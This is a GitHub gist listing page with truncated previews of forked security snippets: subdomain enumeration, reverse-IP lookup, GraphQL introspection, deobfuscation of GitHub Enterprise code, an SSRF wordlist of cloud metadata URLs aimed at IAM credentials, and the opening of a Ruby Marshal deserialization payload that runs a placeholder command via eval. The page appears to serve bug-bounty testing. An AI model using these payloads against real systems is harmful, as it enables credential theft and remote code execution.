Shunmugha Sundaram shamrocksu88

shamrocksu88 / gist:89a938e64a75551b5a70d5f03f66daa7
Created May 25, 2020 13:59 — forked from tillson/gist:620e8ef87bc057f25b0a27c423433fda
Decode Base64 strings in a git repo's commit history
from pydriller import RepositoryMining
import re
import base64

foundSet = set()
# Walk every commit and inspect the pre-change contents of each modified file
for commit in RepositoryMining('./').traverse_commits():
    for mod in commit.modifications:
        if mod.source_code_before is not None:
            # Collect base64-encoded <text> elements from the earlier revision
            regex = re.findall(r"<text encoding=\"base64\">[^>]+</text>", mod.source_code_before)
            for result in regex:
shamrocksu88 / built-in-tools.md
Created February 20, 2020 07:00 — forked from kevinweber/built-in-tools.md
Collection of AEM Links, Commands & Tips / Cheat Sheet

Web Consoles & Tools

shamrocksu88 / revip.py
Created November 28, 2019 05:04 — forked from ayoubfathi/revip.py
Using YouGetSignal API to get domains hosted on the same IP - Reverse IP
import requests
import json
import sys
import argparse
_strip = ['http://', 'https://', 'www']
G = '\033[92m'
Y = '\033[93m'
#!/usr/bin/sudo ruby
#
# revealer.rb -- Deobfuscate GHE .rb files.
#
# This is simple:
# Every obfuscated file in the GHE VM contains the following code:
#
# > require "ruby_concealer.so"
# > __ruby_concealer__ "..."
shamrocksu88 / introspection-query.graphql
Created March 27, 2019 00:08 — forked from craigbeck/introspection-query.graphql
Introspection query for GraphQL
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
shamrocksu88 / cloud_metadata.txt
Created December 28, 2018 03:07 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
shamrocksu88 / second-order.py
Created December 28, 2018 01:21 — forked from PatrikHudak/second-order.py
Second-order subdomain takeover
# coding=utf-8
# python3
from urllib.parse import urlparse
import requests
import urllib3
from bs4 import BeautifulSoup
shamrocksu88 / crt.sh
Created November 9, 2018 01:26 — forked from 1N3/crt.sh
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
# THIS IS COPIED FROM SOMEWHERE. I just saved it in my gists so this can come in handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
  "\x04\x08" +
  "o" +